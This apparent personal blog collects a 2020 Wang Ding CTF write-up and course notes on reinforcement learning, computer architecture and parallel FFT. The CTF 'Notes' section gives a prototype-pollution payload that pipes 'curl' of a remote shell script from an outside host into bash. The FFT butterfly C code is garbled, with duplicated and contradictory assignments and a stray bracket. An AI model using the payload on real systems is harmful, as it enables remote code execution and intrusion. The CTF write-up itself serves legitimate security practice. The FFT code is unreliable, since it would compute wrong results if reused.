Reflection on our 2020 Wang Ding CTF contest

Result

image-20200510230838571

The sunshine will eventually come without doubt tomorrow!

Misc

qiandao

Get the robots.txt from the nginx website and get the destination.

image-20200510231822195

Play the game with gourgeous names in the CTF conf.

image-20200510231813046

Flag in "F12"

image-20200510231804937

Reverse

signal

credit: https://bbs.pediy.com/thread-259429.htm

image-20200510232648046

not happy, it's a vm inside. From vm_operad, we have

image-20200510232802184

image-20200510232837945

The key is case7, we can apply the diction on a1[v10+1] to figure out what happens. So, up the OD.

Appling the table

int table[] = { 0x0A, 4, 0x10, 3, 5, 1, 4, 0x20, 8, 5, 3, 1, 3, 2, 0x8, 0x0B, 1, 0x0C, 8, 4, 4, 1, 5, 3, 8, 3, 0x21, 1, 0x0B, 8, 0x0B, 1, 4, 9, 8, 3, 0x20, 1, 2, 0x51, 8, 4, 0x24, 1, 0x0C, 8, 0x0B, 1, 5, 2, 8, 2, 0x25, 1, 2, 0x36, 8, 4, 0x41, 1, 2, 0x20, 8, 5, 1, 1, 5, 3, 8, 2, 0x25, 1, 4, 9, 8, 3,0x20, 1, 2, 0x41,8, 0x0C, 1, 7,0x22, 7, 0x3F, 7,0x34, 7, 0x32, 7,0x72, 7, 0x33, 7,0x18, 7, 0xA7, 0xFF, 0xFF, 0xFF, 7,0x31, 7, 0xF1, 0xFF, 0xFF,0xFF, 7, 0x28, 7, 0x84, 0xFF,0xFF, 0xFF, 7, 0xC1, 0xFF, 0xFF, 0xFF, 7,0x1E, 7, 0x7A };

We discover the value of a1[v10+1] stays the same.

We can deduct that case 8's to read the user's input, and make the handler as the vector handler in the OS.

the handler can be enumerated as

10h ^ v8[1]-5 = 22h
(20h ^v8[2])*3=3Fh
v8[3]-2-1=34h
(v8[4]+1 )^4 =32 h
v8[5]*3-21h=72h
v8[6]-1-1=33h
9^v8[7]-20=18
(51h +v8[8])^24h=FA7
v8[9]+1-1=31h
2*v8[10]+25h=F1h
(36h+v8[11]) ^41h =28h
(20h + v8[12])*1=F84h
3*v8[13]+25h=C1h
9^v8[14]-20h=1E h
41h + v8[15] +1 =7A h

Eventually we get the total flag{757515121f3d478}.

Web

Notes

image-20200510231219939

get the webshell from the logic in the js.

var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

    get_all_notes() {
        return this.note_list;
    }

    remove_note(id) {
        delete this.note_list[id];
    }
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
  res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
    .get(function(req, res) {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post(function(req, res) {
        let author = req.body.author;
        let raw = req.body.raw;
        if (author && raw) {
            notes.write_note(author, raw);
            res.render('mess', {message: "add note sucess"});
        } else {
            res.render('mess', {message: "did not add note"});
        }
    })

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

app.route('/delete_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to delete a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        if (id) {
            notes.remove_note(id);
            res.render('mess', {message: "delete done"});
        } else {
            res.render('mess', {message: "delete failed"});
        }
    })

app.route('/notes')
    .get(function(req, res) {
        let q = req.query.q;
        let a_note;
        if (typeof(q) === "undefined") {
            a_note = notes.get_all_notes();
        } else {
            a_note = notes.get_note(q);
        }
        res.render('note', {list: a_note});
    })

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })


app.use(function(req, res, next) {
  res.status(404).send('Sorry cant find that!');
});


app.use(function(err, req, res, next) {
  console.error(err.stack);
  res.status(500).send('Something broke!');
});


const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))

Apply the "中国菜刀" payloads id=__proto__.abc&author=curl%20http://gem-love.com:12390/shell.txt|bash&raw=a in the undefsafe.

get the code from /var/html/code/flag

flag{ 8c46c34a-fa1f-4fc9- 81bd- 609b1aafff8a }

Crypto

boom

image-20200510231932335

just play a simple game

image-20200510231952896

md5:en5oy

image-20200510232016920

stupid z=31,y=68, x=74

image-20200510232038249

stupid Mathemetica.

image-20200510232104887

You Raise Me up

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from Crypto.Util.number import *
import random

n = 2 ** 512
m = random.randint(2, n-1) | 1
c = pow(m, bytes_to_long(flag), n)
print 'm = ' + str(m)
print 'c = ' + str(c)

# m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386318986881041563704825943945069343345307381099559075
# c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373211308485605397024123180085924117610802485972584499

What you need to do is to calculate the \(m^f\equiv c\ mod\ n\)

\(n\) is actually $2^512$.

just another Modular arithmetic like "点鞭炮", which can be searched on stackoverflow.

Reflection

We have to practice more and collaborate more!

[RL] RL Category

Following the wikipeadia

Reinforcement Learning is an area of machihne learning inspired by behavioral psychology, concerned with how software agents ought to take actions in an environment so as to maximzie some notion of cumulative reward.

image-20200412150622271

Behavioral Psychology

Behavior is primarily shaped by reinforcement rather than free-will.

  • behaviors that result in praise/pleasure tend to repeat
  • behaviors that result in punishment/pain tend to become extinct

agent

An entity (learner & decision maker) that is equipped with Sensors end-effectors and goals

image-20200412145820170

Action

  • Used by the agent to interact with the environment.
  • May have many di↵erent temporal granularities and abstractions

image-20200412145849260

reward

A reward R**t is a scalar feedback signal

Indicates how well agent is doing at step t

The agent’s job is to maximize cumulative reward

hypothesis: All goals can be described by the maximization of expected cumulative reward

image-20200412150016842

Main Topics of Reinforcement Learning

Learning: by trial and error

Planning: search, reason, thought, cognition

Prediction: evaluation functions, knowledge

Control: action selection, decision making

Dynamics: how the state changes given the actions of the agent

Model-based RL

  • dynamics are known or are estimated
  • solving RL problems that use models and planning

Model-free RL

  • unknown dynamics
  • explicitly trial-and-error learners

not necessarily iid

image-20200412150553154

P.S. 逆强化学习。

Summary

image-20200412151935910

[Computer Architecture] superscalar

Greater Instruction-Level Parallelism (ILP)

  • Multiple issue “superscalar”
    • Replicate pipeline stages ⇒ multiple pipelines
    • Start multiple instructions per clock cycle – CPI < 1, so use Instructions Per Cycle (IPC)
    • E.g., 4GHz 4-way multiple-issue
      • 16 BIPS, peak CPI = 0.25, peak IPC = 4
    • But dependencies reduce this in practic
  • “Out-of-Order” execution
    • Reorder instructions dynamically in hardware to reduce impact of hazards
  • Hyper-threading

Pipelining recap

image-20200409104529546

image-20200409104719616

image-20200409104748552

pipelines complexities exlained

GPRs FPRs

  • More than one Functional Unit
  • Floating point execution!
    • Fadd & Fmul: fixed number of cycles; > 1
    • Fdiv: unknown number of cycles!
  • Memory access: on Cache miss unknown number of cycles
  • Issue: Assign instruction to functional unit

image-20200410165203353
image-20200410165333359

summary

image-20200409104937513

Some static multiple issues

VLIW: very long instruction word

image-20200410165502554

The solution can be easily found

image-20200409143437506

image-20200409144123473

Quiz

[ ] A. In-order processors have a CPI >=1

[x] B. more stages allow a higher clock frequency

[x] D. OoO pipleines need speculation

[ ] E. superscalar processor can execute

[Computer Architecture] data path

intro - where are we now?

image-20200331101915459

the cpu

Processor - datapath - control

cenario in RISC-V machine

image-20200331102713392

The datapath and control

image-20200331120145444
image-20200331120240686

Overview

  • problem: single monolithic bloc
  • solution: break up the process of excuting an instruction into stages
    • smaller stages are easier to design –
    • easy to optimize &modularity

five stages

image-20200331102935318

  • Instruction Fetch
    • pc+=4
    • take full use of mem hierarchy
  • Instruction Decode
  • read the opcode to determine instruction type and field lengths
  • second, (at the same time!) read in data from all necessary registers
    • for add, read two registers
    • for addi, read one register
  • third, generate the immediates
  • ALU
    • the real work of most instructions is done here: arithmetic (+, -, *, /), shifting, logic (&, |)
    • For instance, it's load and store
      • lw t0, 40(t1)
      • the address we are accessing in memory = the value in t1 PLUS the value 40
      • so we do this addition in this stage
  • Mem access
    • Actually only the load and store instruction do anything during this stage.
    • it's fast but unavoidable
  • Register write
    • write the result of some computation into a register.
    • for stores and brances idle

      misc

      image-20200331200948199

    image-20200331104008311

    memory alignment

    image-20200331201039177

data path elements state and sequencing

register

image-20200331112454437

instruction level

add

image-20200331105222087image-20200331105422860

image-20200331110018593

time diagram for add

image-20200331111255018

addi

image-20200331120334870

lw

image-20200331202936147

image-20200331203002110

sw - critical path

image-20200331203121826

image-20200331120529637

combined I+S Immediate generation

image-20200331203242961

branches

image-20200331120922178

image-20200331112154728

image-20200331114914251

pipelining

image-20200331120724483

summary

image-20200331180540752

quiz

image-20200331181726584

for D

image-20200331181714589image-20200331181804796image-20200331181819265

for E

image-20200331182129638

CS 150 is composed of the TsingHua's 计算机组成原理 and VSLI

CS 150 is composed of the TsingHua's 计算机组成原理 and VSLI

source:http://www-inst.eecs.berkeley.edu/~cs150/sp13/agenda/

image-20200326172234625

They studied verilog

FSM is really similar to our homework. actually, I found that their exams is given to us for homework.

P.S.: WHY they have spring break?image-20200326172618489

image-20200326172816315

run a linux on FPGA. and implement a CPU. 俗称“造机”。

If I have time, I'll implement the CPU by my own.

GPU applying the RISC-V architecture will be much better and cooler.

The more I read and learn , the more I found the knowledge in the EECS category can be nicely cascaded. In most of the cases, we get the point from another place and we can be taught within minutes.

After talking with upperclassman 罗浩聪, I guadully find my career as an PhD in Arch or PL, or sth, in between. But for now, let me finish the 2 cooperate papers.

[Computer Architecture] Circuit

intro

image-20200325123544978

synchronous digital systems

Hardware of a processor should be synchronous and digital

The hardware layer of abstraction

image-20200325123706861

switches

image-20200325123737670

arrow shows action if wire changes to 1 or is asserted.

and & or

image-20200325123840940

Transistors

High voltage$V_{dd}$ Low voltage \(Gnd\)

PWD

we implement switches using CMOS

CMOS Transistor Networkimage-20200325124156574

image-20200325124245875vsimage-20200325124301345

note PWD

material:image-20200325124415901

how MOSFET Operation

image-20200325124509056
image-20200325124827736

CMOS Networks

2 input network

image-20200325141011777

combined logit symbols

image-20200325141058284

example debugging waveform

image-20200325140800590
image-20200325140219499

types of circuits

CL

SL

image-20200325140345618

example using time chart

image-20200325140122110
image-20200325140122110

[Computer Architechture] call

Language Execution continuum

An interpreter is a program that executes other programs.

  1. langurage translation gives us another option
  2. In genreral, we interpret a high-level language to a lower-level language to increase preformance

image-20200320143508476

interpretation

  1. Python
  2. asm

Assembler directives

image-20200320143656584

pseudo-instruction replacement

image-20200320143736406

what's tail's about
{...
 lots of code
 return foo(y);
}
  • it's recursive call to foo() if this is within foo(), or call to a different function...
  • for effictiency
    • Evaluate the arguments for foo() in a0-a7
    • return ra, all callee saved registers and sp
    • Then call foo() with j or tail
  • when foo() returns, it can return directly to where it needs to return to
    • Rather than returning to wherever foo() was called and returning from there
    • Tail call optimization

branches

image-20200320144520209

Linking progress

image-20200320150133861

image-20200320150156550

Four types of Address

PC- relative addredding (beq)

Absolute addresses in RISC-V

image-20200320150357128

Loading process

image-20200320150929601

Running a Program - CALL(Compiling, Assembling, Linking, and Loading)

Clarifications

Project 1 RISC-v emulator

  1. Risc-v isa does not define assembly syntax
    behave exactly like Venus
  2. All I-Type instructions (including sltiu)
    • do sign-extension
    • (in venus) input number is signed, even if hex

a good tool

Interpretation

  1. any good reason to interpret machine language in software? debbuger Venus
  2. translated/compiled code almost always more efficitent and therfore higher performance:
    • important for many applications, particularly operating systems.

Steps in compiling a C program

Psuedo-instruciton Replacement

Producing Machine Language

  • simple case
    • arithmetic, logical, shifts and so on
    • All necessary info is within the instruction already
  • branches can be optimized

parallel programing 23 parallel fft

One of the most import algorithm in the new century

Intro to the fft

The basic equation of the FFT

\(F(\omega)=F|f(t)|=\int ^{+\infty}_{-\infty}f(t)e^{-j\omega t}dt\)

Roots of unity

\[
\begin{array}{l}\text { An n'th root of unity is an } \omega \text { s.t. } \ \omega^{n}=1 \text { . } \ \text { There are n roots n'th roots of } \ \text { unity, and they have the form } \ e^{\frac{2 \pi i k}{n}}, \text { for } 0 \leq k \leq n-1 \text { . } \ \text {Write } \omega_{n}=e^{\frac{2 \pi i}{n}} \text { , so that the n'th } \ \text { roots of unity are } \omega_{n}^{0}, \omega_{n}^{1}, \ldots, \omega_{n}^{n-1} \end{array}\]

Some problems to differ DT,DFT,FFT,IFFT

They are Fourier Transform, Discrete Fourier Transform, Fast Fourier Transform and Inverse Fourier Transform.
The transform factor:
\(\text { Fact } 1 \omega_{n}^{n}=1 \text { . } \ \text { Fact } 2 \omega_{n}^{k+\frac{n}{2}}=-\omega_{n}^{k} \ \text { Fact } 3\left(\omega_{n}^{k}\right)^{2}=\omega_{n}^{2 k}=\omega_{n / 2}^{k}\)

Why we should have the DFT.
Because in theory, all the data stored in computer is Discrete. So we have to use the equation \(X(k)=\sum^{N-1}_0x(n)W^{kn}_N(k\in \mathbb{N})\)

The Transform factor is used to prove the
1) Periodicity
\(W_{N}^{m+l N}=W_{N}^{m},\)\) where \(\(: W_{N}^{-m}=W_{N}^{N-m}\)
2) Symmetry
\(W_{N}^{m+\frac{N}{2}}=-W_{N}^{m}\)
3) Contractability
\(W_{N / m}^{k}=W_{N}^{m k}\)
4) Special rotation factors
\(W_{N}^{0}=1\)

  1. Why Fourier Fast Algorithm (aka FFT)?

FFT is a DFT-based algorithm designed to accelerate the computational speed of DFT.

Given a degree \(n\) -1 polynomial
\(A(x)=a_{0}+a_{1} x+a_{2} x^{2}+\dots+a_{n-1} x^{n-1}\)
DFT computes \(A\left(\omega_{n}^{0}\right), A\left(\omega_{n}^{1}\right), \ldots, A\left(\omega_{n}^{n-1}\right)\)
since \(A(x)=a_{0}+x\left(a_{1}+x\left(a_{2}+\cdots\right) \ldots\right)\)
\(A(x)\) can be evaluated in \(\mathrm{O}(\mathrm{n})\) time and
\(\mathrm{O}(1)\) memory.

  • DFT can be computed trivially in \(\mathrm{O}\left(\mathrm{n}^{2}\right)\)
    time.

For the DFT formula computer implementation the complexity is o(N²), while the complexity by FFT calculation is reduced to: N×log2(N)

  1. What is the sequence split extraction in FFT?

The sequence splitting process of FFT is the extraction process, which is divided into: extraction by time and extraction by frequency.

1) Extraction by time (also called parity extraction)


2) Frequency, which we don’t apply here.

  1. How does FFT reduce the amount of computation?

In simple terms, mathematicians use the above mentioned properties of the rotation factor W such as periodicity, symmetry, etc. to simplify the formula. In algorithmic programming, new points are constantly counted using points that have already been counted, i.e., old points count new points.

Theoretically, FFT computes the DFT in O(n log n) time using divide and conquer.
\square Suppose n is a power of 2.
Let \(A^{[0]}=a_{0}+a_{2} x^{1}+a_{4} x^{2}+\cdots+a_{n-2} x^{\frac{n}{2}-1}\)
\(A^{[1]}=a_{1}+a_{3} x^{1}+a_{5} x^{2}+\cdots+a_{n-1} x^{\frac{n}{2}-1}\)
Then \(A(x)=A^{[0]}\left(x^{2}\right)+x A^{[1]}\left(x^{2}\right)\).
So can compute \(A\left(\omega_{n}^{0}\right), A\left(\omega_{n}^{1}\right), \ldots, A\left(\omega_{n}^{n-1}\right)\) by computing \(A^{[0]}\) and \(A^{[1]}\)
at \(\left(\omega_{n}^{0}\right)^{2},\left(\omega_{n}^{1}\right)^{2}, \ldots,\left(\omega_{n}^{n-1}\right)^{2}\), and multiplying some terms by
\(\omega_{n}^{0}, \omega_{n}^{1}, \ldots, \omega_{n}^{n-1}\).
But \(\left(\omega_{n}^{k+n / 2}\right)^{2}=\omega_{n}^{2 k+n}=\omega_{n}^{2 k}=\left(\omega_{n}^{k}\right)^{2}\) by Fact 1.
A So \(\left\{\left(\omega_{n}^{0}\right)^{2},\left(\omega_{n}^{1}\right)^{2}, \ldots,\left(\omega_{n}^{n-1}\right)^{2}\right\}=\left\{\left(\omega_{n}^{0}\right)^{2},\left(\omega_{n}^{1}\right)^{2}, \ldots,\left(\omega_{n}^{n / 2-1}\right)^{2}\right\},\) i.e. only need
to evaluate \(A^{[0]}\) and \(A^{[1]}\) at n/2 points instead of n.
Also, \(\left(\omega_{n}^{k}\right)^{2}=\omega_{n}^{2 k}=\omega_{n / 2}^{k}\)

Note: Simply splitting a multipoint sequence into a less point sequence without simplification is not a reduction in arithmetic volume!!! Splitting is only in the service of simplification, using the spin factor is the key to arithmetic reduction!!!

Time Complexity:
Thus, computing \(A(x)=A^{[0]}\left(x^{2}\right)+x A^{[1]}\left(x^{2}\right)\) for
\(x \in\left\{\omega_{n}^{0}, \omega_{n}^{1}, \ldots, \omega_{n}^{n-1}\right\}\) requires
\(\square\) Computing for \(A^{[0]}(x)\) and \(A^{[1]}(x)\) for \(x \in\)
\(\left\{\omega_{n / 2}^{0}, \omega_{n / 2}^{1}, \ldots, \omega_{n / 2}^{n / 2-1}\right\}\)

  • These are also DFT’s, so can be done recursively using two
    n/2-point FFT’s.
    \square For \(0 \leq k \leq \frac{n}{2}-1\)
    \[
    \begin{array}{l}\qquad A\left(\omega_{n}^{k}\right)=A^{[0]}\left(\omega_{n / 2}^{k}\right)+\omega_{n}^{k} A^{[1]}\left(\omega_{n / 2}^{k}\right) \ \begin{array}{l}\qquad A\left(\omega_{n}^{k+n / 2}\right)=A^{[0]}\left(\omega_{n / 2}^{k+n / 2}\right)+\omega_{n}^{k+n / 2} A^{[1]}\left(\omega_{n / 2}^{k+n / 2}\right) \ =A^{[0]}\left(\omega_{n / 2}^{k}\right)-\omega_{n}^{k} A^{[1]}\left(\omega_{n / 2}^{k}\right)\end{array}\end{array}
    \]

  1. Butterfly operation?

For a butterfly operation, you can understand it as an operation that is customizable by a graph.

The left side is the input and the right side is the output, for the letters on the horizontal line there are two cases.

1) A number on the left end line (none means C and D are 1).

2)The right end lines have the numerical representation, but if none, C & D are 0s.

The FFT takes out odd and even in accordance to time to change the original sequence. which have to sequentialize it to make the algorithm meet the required sequence. The new sequence is the reverse binary sequence of the original ones.

For example \((a_0 a_4 a_2 a_6 a_1 a_5 a_3 a_7)\) have the binary sequence \((000,100,010,110,001,101,011,111)\).
The reverse order can be simply treated as the change of 2 near binary number, which in this case is:\((a_0 a_1 a_2 a_3 a_4 a_5 a_6 a_7)\);

Which is \((000,001,010,011,100,101,110,111)—>(000,100,010,110,001,101,011,111)\).

The code for this transformation:

for(I=0;I<N;I++) // According to law 4, you need to perform inter-code inverse order for all elements of the array
{  
  /* Get the value of the inverse J of subscript I*/ 
  J=0;
  for(k=0;k<(M/2+0.5);k++) //k indicates operation
     {
        /* Reverse sequence operation*/
        m=1;//m is a binary number with a minimum of 1
        n=(unsigned int)pow(2,M-1);//n is a binary number with the Mth degree of 1.
        m <<= k; // for m move left k
        n>>= k; //shift k bits to the right of n
        F0=I & n;//I & n by the kth position of the first half of the extracted
        F1=I & m;//I with m-pressure bit corresponding to the lower part of the second half of the extracted F0
        if(F0) J=J | m; //J and m are in position or so that F0 corresponds to a low position of 1
        if(F1) J=J | n; //J and n are in the same position or so that F1 corresponds to a high level of 1
     }
   if(I<J)
    {
      Temp=A[I];
      A[I] =A[J];
      A[J]=Temp;
    }                                
}

The butter fly operation:
Now let’s imagine that if we want to program the FFT algorithm, the most basic implementation of the FFT algorithm is the butterfly operation, for any butterfly such as.

When N=8.

As can be seen from the above figure, to perform the butterfly operation, we have to solve the following problems.

  • Interval B between two input data

  • Determination of the rotation factor W, including.

    • Determination of the L-level rotation index P.
    • Determination of the type of Level L W.
    • The interval between the same W in level L.

\(\left\{\begin{array}{l}T_{R}=X_{R}(\mathrm{j}+B) \cos \frac{2 \pi}{N} p+X_{I}(j+B) \sin \frac{2 \pi}{N} p \cdots(1) \ T_{\mathrm{I}}=X_{I}(j+B) \cos \frac{2 \pi}{N} p-X_{R}(j+B) \sin \frac{2 \pi}{N} p \cdots(2) \ \mathrm{A}_{\mathrm{R}}(\mathrm{j})=X_{R}(\mathrm{j})+T_{R} \ \mathrm{A}_{\mathrm{I}}(\mathrm{j})=X_{I}(\mathrm{j})+T_{\mathrm{I}} \ \mathrm{A}_{\mathrm{R}}(\mathrm{j}+\mathrm{B})=X_{R}(\mathrm{j})-T_{R}(5) \ \mathrm{A}_{\mathrm{I}}(\mathrm{j}+\mathrm{B})=X_{I}(\mathrm{j})-T_{\mathrm{I}}(6)\end{array}\right.\)

for(L=1; L<=M;L++) //FFT butterfly level L from 1--M
{  
  /* L-level operations*/  
  //First calculate the interval B = 2^(L-1);
  B = 1;
  B = (int)pow(2,L-1);
  for(j=0; j<=B-1;j++)
  {
    /* Homogeneous butterfly operation*/  
    // First increment k=2^(M-L)
    k = (int)pow(2,M-L);
    // Calculate the rotation index p in increments of k, then p = j*k
    P=1;
    P=j*k;
    for(i=0; i<=k-1;i++)
    {
      /* Perform butterfly operations*/
      //Array calibrated to r
      r=1;
      r=j+2*B*i;
      Tr=dataR[r+B]*cos(2.0*PI*p/N) + dataI[r+B]*sin(2.0*PI*p/N);
      Ti=dataI[r+B]*cos(2.0*PI*p/N) - dataR[r+B]*sin(2.0*PI*p/N);
      dataR[r+B]=dataR[r]-Tr;
      dataI[r+B]=dataI[r]-Ti;
      dataR[r]=dataR[r]-Tr; dataI[r+B]=dataI[r]-Ti; dataI[r]-Ti; dataR[r]=dataR[r]+Tr;
      dataI[r]=dataI[r]]+Ti;
    }
  }
}

IFFT is the reverse of the above operation.

  1. What if we take it on the mesh or hypercube to make it scalable on gpu oprations?

Hpercube:

  • Consider the binary exchange algorithm on a hypercube architecture.
  • Each processor connected to d others, which differ in each digit of ID.
    • Communication only with neighbors, send n/p values each time.
    • since d = log p rounds of communication, communication time \(T_{c}=\) \(t_{s} \log p+t_{w} \frac{7}{p} \log p .\)
  • Each stage does n/p computation.
    • Total computation time \(T_{p}=\frac{t_{c} n}{p} \log n\).
  • Efficiency is \(E=\frac{T_{p}}{T_{p}+T_{c}}=1 /\left(1+\frac{t_{s} p \log p}{t_{c} n \log n}+\frac{t_{w} \log p}{t_{c} \log n}\right)\)
  • Define \(K\) such that \(E=1 /(1+1 / K) .\)
  • For isoefficiency, want last two terms in denominator to be constant.
  • \(\frac{t_{s} p \log p}{t_{c} n \log n}=\frac{1}{K}\) implies \(n \log n=W=K \frac{t_{s}}{t_{c}} p \log p .\)
  • \(\frac{t_{w} \log p}{t_{c} \log n}=\frac{1}{K}\) implies \(\log n=K_{t_{c}}^{t_{w}} \log p,\) so \(n=p^{K t_{w} / t_{c}},\) so
  • \(W=K \frac{t_{w}}{t_{c}} p^{K t_{w} / t_{c}} \log p\)

The efficiency for this case depends on \(t_c,t_s,t_w\), the wait time is the tradeoffs between two different lines. which is:

From the Efficiency law
, we have once \(\frac{Kt_w}{t_c}>1\), the increasing time is polynomial with regard to the processor count.

Mese:

2D transpose FFT: The best:

Reference

  1. Prof Fan’s PPT
  2. Implement FFT in C by GoKing
  3. Implement FFT on QPU rpi3b+ by Andrew Holme